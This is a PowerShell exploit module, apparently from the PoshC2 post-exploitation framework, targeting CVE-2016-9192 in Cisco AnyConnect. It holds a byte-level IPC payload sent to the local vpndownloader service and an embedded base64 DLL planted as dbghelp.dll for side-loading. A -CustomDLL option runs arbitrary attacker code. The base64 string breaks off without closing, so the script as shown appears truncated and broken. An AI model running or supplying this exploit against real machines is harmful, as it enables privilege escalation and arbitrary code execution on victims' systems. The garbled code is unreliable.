PoshC2_Python/Modules/CVE-2016-9192.ps1

<#
.Synopsis
    Attempts to exploit cve-2016-9192 which misuses a side loading vulnearbility in Cisco Anyconnects vpnupdater

.DESCRIPTION
	Attempts to exploit cve-2016-9192 which misuses a side loading vulnearbility in Cisco Anyconnects vpnupdater. This module drops a DLL to disk that will only create a file to prove the exploit works under the root of C:  
    
    Script Author: Ben Turner @benpturner
    POC: Proof-of-concept and initial code from https://github.com/serializingme/cve-2016-9192

.EXAMPLE
    PS C:\> Invoke-CVE-2016-919

.EXAMPLE
    PS C:\> Invoke-CVE-2016-919 -CustomDLL <path to dll>
#>
Function Invoke-CVE-2016-9192 {

param ($CustomDLL)

    [Byte[]] $payload = 
    0x4F, 0x43, 0x53, 0x43,
    # Message header length
    0x1A, 0x00,
    # Message body length
    0xE4, 0x00,
    # IPC response
    0xFF, 0xFF, 0xFF, 0xFF,
    # Message user context
    0x00, 0x00, 0x00, 0x00,
    # Request message identifier
    0x02, 0x00, 0x00, 0x00,
    # Return IPC object
    0x00, 0x00, 0x00, 0x00,
    # Message type
    0x01,
    # Message identifier
    0x02,
    # File path
    # C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
    0x00, 0x01, # Type
    0x00, 0x57, # Length
    0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
    0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
    0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
    0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
    0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
    0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
    0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
    0x78, 0x65, 0x00,
    # Command line (command line should start with "CAC-" or other valid command)
    # CAC-doesnt-matter
    0x00, 0x02, # Type
    0x00, 0x12, # Length
    0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
    0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
    # GUI desktop (not mandatory)
    # WinSta0\Default
    0x00, 0x04,
    0x00, 0x10,
    0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
    0x75, 0x6C, 0x74, 0x00,
    # Use installed
    # False
    0x80, 0x05,
    0x00, 0x00,
    # Relocatable file path
    # C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
    0x00, 0x06,
    0x00, 0x57,
    0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
    0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
    0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
    0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
    0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
    0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
    0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
    0x78, 0x65, 0x00

    $Base64Dll = "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
    $Exploited = "C:\CVE-2016-9192.txt"
    $TempFolder = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp"
    $TempPath = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader"
    $DLLLocation = "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Downloader\dbghelp.dll"

    if ($CustomDLL) {
        Write-Output "[.] Using custom DLL: $CustomDLL"
        $Base64Dll = ConvertTo-Base64 $CustomDLL
    }

    $PathExists = Test-Path $TempPath
    if (!$PathExists) {
        New-Item $TempPath -ItemType Directory | Out-Null
    }
    
    $PathExists = Test-Path $DLLLocation
    if (!$PathExists) {
        Write-Output "[.] Dropping DLL to disk: $DLLLocation"
        $fileBytes = [Convert]::FromBase64String($Base64Dll)
        [io.file]::WriteAllBytes($DLLLocation, $fileBytes)
    } else {
        Write-Output "[.] Using DLL already in the following location: $DLLLocation"        
    }

    Write-Output "[.] Connecting to localhost on port 62522"
    try
    {
	    $socket = New-Object System.Net.Sockets.TcpClient( "127.0.0.1", "62522" )
        Write-Output "[.] Sucessfully connected to localhost on port 62522"
    }
    catch
    {
        Write-Output "`n[-] Connection failed, is Cisco Anyconnect running"
	    exit -1
    }

    $stream = $socket.GetStream();
    $stream.Write($payload,0,$payload.Length);
    $stream.Flush();
    $stream.Close();
    
    Start-Sleep 2

    if ($CustomDLL) {
        Write-Output "`n[+] Exploitted, custom DLL should have been executed!"
    } else {
        $PathExists = Test-Path $Exploited
        if (!$PathExists) {
            Write-Output "`n[-] Exploit failed!"
        } else {
            Write-Output "`n[+] Exploit successful! Target is vulnerable to CVE-2016-9192"  
            Write-Output "[+] To add a custom DLL use the following command: Invoke-CVE-2016-9192 -CustomDLL <Path to DLL>"      
        }
    }

    Write-Output "[+] Manual removal of $TempFolder required"
}
function ConvertTo-Base64
{
    param
    (
        [string] $Source
    )
    $bufferSize = 90000
    $buffer = New-Object byte[] $bufferSize

    $reader = [System.IO.File]::OpenRead($Source)
    $base64 = $null
    $bytesRead = 0

    do
    {
        $bytesRead = $reader.Read($buffer, 0, $bufferSize);
        $base64 += ([Convert]::ToBase64String($buffer, 0, $bytesRead));
    } while ($bytesRead -eq $bufferSize);

    $reader.Dispose()
    $base64
}